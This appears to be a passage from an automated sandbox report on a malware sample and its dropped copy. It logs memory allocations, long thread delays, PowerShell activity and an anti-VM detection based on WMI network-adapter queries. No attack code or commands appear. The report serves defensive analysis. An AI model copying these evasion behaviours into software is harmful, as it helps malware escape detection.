                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 5510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 6510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 6640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 7640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: B6C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: C6C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: CB50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: DB50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: 4C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 15E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 3030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 5030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 56A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 66A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 67D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 77D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: B2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: C2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: C770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: D770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 1500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 2FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory allocated: 4FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199969Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199844Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199734Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199625Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199516Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199407Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199282Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199157Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199047Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1198938Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199875
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199766
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199641
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199313
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199188
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199063
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198839
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198625
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198515
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6710Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6757Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWindow / User API: threadDelayed 3617Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWindow / User API: threadDelayed 6231Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWindow / User API: threadDelayed 7846
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWindow / User API: threadDelayed 2011
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 2676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 6710 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99849s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99280s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99167s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -99059s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98246s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -98031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97909s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97565s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97334s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97192s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -97078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96858s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96202s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -96093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -95984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -95873s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -95765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -95656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -95546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199407s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199282s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199157s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1199047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688Thread sleep time: -1198938s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99661s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99416s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -99093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98982s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98764s >= -30000s
